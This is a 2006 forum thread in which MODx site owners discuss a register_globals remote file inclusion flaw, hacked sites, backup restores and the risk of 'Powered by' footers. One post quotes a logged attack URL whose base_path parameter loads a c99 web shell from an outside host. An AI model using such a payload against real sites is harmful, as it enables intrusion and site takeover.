Re: Critical Security Measure

Admin Note: This is in reference to http://modxcms.com/forums/index.php/topic,8604

Now that was a quick fix !
I am putting a sticky in the french boards about this. I think we should notify all moderators to do the same. Not everyone read the english boards

Off to appying the patch on my installs... Edit : DONE. Duh, not needed I have register_globals OFF...

Anyway, thanks to Aour for reporting this on the original thread

I found this thread too late. My client’s site has just been hacked by taking advantage of this flaw. The hacker used the flaw to modify config.inc.php. On checking zone-h.org, I see he has got to quite a number of other MODx sites during the last 24 hours. I’m trying to persuade my client’s host to have register_globals set to off....

The hacker tried to hack my site!
I found the following access on my stats:

http : //www.roma21.it/ index.php?page=manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://hackeramca.tripod.com/c99shell.txt?

Some information about the hacker:
Windows XP Firefox 2.0 1024x768 32 bit 88.224.109.151
Referer:

Google (Turkey), Query:
"powered by MODx"

Apart from this, yesterday I had a HUGE number of accesses coming from Google query "Powered by MODx"; many of them came from Turkey, but also Egipt, Morocco, Pakistan, China, France, Germany, etc.; that’s weird, I don’t know if Google suddenly increased my PageRank or there are lots of hackers around the net

Edit: My register_globals variable is set to ON. I wonder why the attack wasn’t successful... or perhaps my system has been already infected? What can I do in this case?

Yeah of course you did, that’s how they spot that you’re using MODx... I don’t know if the fact I have the "powered by" translated in french but I didn ’t get hit...

In the past, I had removed any reference to the CMS being used. Recently I have been putting a simple "Powered by MODx" in the footer of MODx sites in recognition of the advantages MODx provides me. This hack has given me cause to reflect on whether I have done the right thing by including the "powered by..." message

My concern has always been that a site becomes more vulnerable if it becomes known what scripts are being run on a site - the reason I removed all references in the first place. MODx does a good job of not revealing its identity in the code it outputs (unlike some other CMSs). The exception is that it seems to be the only CMS that uses "/manager" as its admin directory. Ideally we should be able to choose a unique name at time of installation to make the lives of hackers just that much more difficult.

Quote from: Commodore64 at Nov 04, 2006, 10:59 AM

My register_globals variable is set to ON. I wonder why the attack wasn’t successful... or perhaps my system has been already infected? What can I do in this case?

Although the site was running fine until about 12 hours ago, installing a backup from 30-Oct did not fix the problem. We has to go back to prior to 28-Oct to get up and running again. Once we discovered that the only file affected was config.inc.php, we restored to yesterday’s backup and then restored config.inc.php from 27-Oct.

I’d like the host provider to provide me with before & after versions of the file, as there may be some date triggerred trojan lurking in there. As a precaution, it might not hurt to check out that file.

Ive been hacked also.... the sucker left a message: "[email protected] was here"

Well another way to give credit to MODx without having the text is to use an IMG with no ALT tag. I think there are images floating around the forum to that effect.

It’s unfortunate, but the reality has become that you take a big risk providing critical information publicly like that about the scripts you use. In some ways, when an exploit is found, you may be doing more harm than good to the reputation of the script. Forum makers are in some ways, their worst enemies... most require a credit and a link back to their sites, which means as soon as an exploit gets discovered, the hackers can turn to the search engines and get a list of potential targets in seconds.

It would seem that hackers have become highly efficient... specializing in going after certain scripts or using certain exploits to increase their "success" rate and hit as many targets in as short a period of time. Too bad all that intelligence can be put to some better use.

Well, now with the new Google code search, it may be possible for them to find any site with that vulnerability.